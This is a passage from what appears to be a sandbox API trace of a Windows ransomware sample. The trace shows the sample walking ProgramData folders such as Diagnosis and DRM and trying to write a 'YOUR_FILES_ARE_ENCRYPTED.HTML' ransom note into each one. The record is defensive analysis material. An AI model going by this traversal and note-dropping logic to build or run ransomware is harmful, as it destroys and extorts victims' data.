Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.949] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc" [0109.949] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\*" [0109.949] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae7063aa, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0109.949] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae7063aa, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0109.949] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7063aa, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae7063aa, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae70b50e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.949] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7063aa, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae7063aa, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae70b50e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.949] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0109.949] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0109.949] GetProcessHeap () returned 0x600000 [0109.949] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.950] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.950] GetProcessHeap () returned 0x600000 [0109.950] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.950] GetProcessHeap () returned 0x600000 [0109.950] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.950] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="SoftLanding", cAlternateFileName="SOFTLA~1")) returned 1 [0109.951] StrStrIW (lpFirst="SoftLanding", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.951] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding") returned 54 [0109.951] GetProcessHeap () returned 0x600000 [0109.951] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.951] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding" [0109.951] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\*" [0109.951] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae714df4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0109.952] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae714df4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0109.952] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae714df4, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae714df4, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae719e8e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.952] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae714df4, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae714df4, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae719e8e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.952] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0109.952] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0109.952] GetProcessHeap () returned 0x600000 [0109.952] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLanding\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\softlanding\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.953] GetProcessHeap () returned 0x600000 [0109.953] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.953] GetProcessHeap () returned 0x600000 [0109.953] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.953] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="SoftLandingStage", cAlternateFileName="SOFTLA~2")) returned 1 [0109.953] StrStrIW (lpFirst="SoftLandingStage", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.953] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage") returned 59 [0109.953] GetProcessHeap () returned 0x600000 [0109.953] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.954] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage" [0109.954] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\*" [0109.954] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae72ae1c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0109.954] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae72ae1c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0109.955] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae72ae1c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae72ae1c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae72fba4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.955] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae72ae1c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae72ae1c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae72fba4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.955] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0109.955] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0109.955] GetProcessHeap () returned 0x600000 [0109.955] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.955] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\SoftLandingStage\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\softlandingstage\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.956] GetProcessHeap () returned 0x600000 [0109.956] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.956] GetProcessHeap () returned 0x600000 [0109.956] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.956] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae735db0, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae735db0, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae73aba6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.957] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae735db0, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae735db0, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae73aba6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.957] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0109.957] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 72 [0109.957] GetProcessHeap () returned 0x600000 [0109.957] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0109.957] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.957] GetProcessHeap () returned 0x600000 [0109.957] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0109.957] GetProcessHeap () returned 0x600000 [0109.957] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0109.958] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="DRM", cAlternateFileName="")) returned 1 [0109.958] StrStrIW (lpFirst="DRM", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.958] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM") returned 36 [0109.959] GetProcessHeap () returned 0x600000 [0109.959] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0109.959] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM" [0109.959] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*" [0109.960] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae751f0c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626738 [0109.960] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae751f0c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0109.960] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Server", cAlternateFileName="")) returned 1 [0109.960] StrStrIW (lpFirst="Server", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.960] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server") returned 43 [0109.960] GetProcessHeap () returned 0x600000 [0109.960] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.961] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server" [0109.961] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*" [0109.961] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae748321, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628efa, dwReserved1=0x628eb0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0109.961] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae748321, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628efa, dwReserved1=0x628eb0, cFileName="..", cAlternateFileName="")) returned 1 [0109.961] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae748321, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae748321, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae74d4b2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628efa, dwReserved1=0x628eb0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.961] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae748321, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae748321, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae74d4b2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628efa, dwReserved1=0x628eb0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.961] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0109.961] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0109.961] GetProcessHeap () returned 0x600000 [0109.961] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.961] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.962] GetProcessHeap () returned 0x600000 [0109.962] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.962] GetProcessHeap () returned 0x600000 [0109.962] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.963] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae751f0c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae751f0c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae7559b1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.963] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae751f0c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae751f0c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae7559b1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.963] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0109.963] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0109.963] GetProcessHeap () returned 0x600000 [0109.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0109.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all 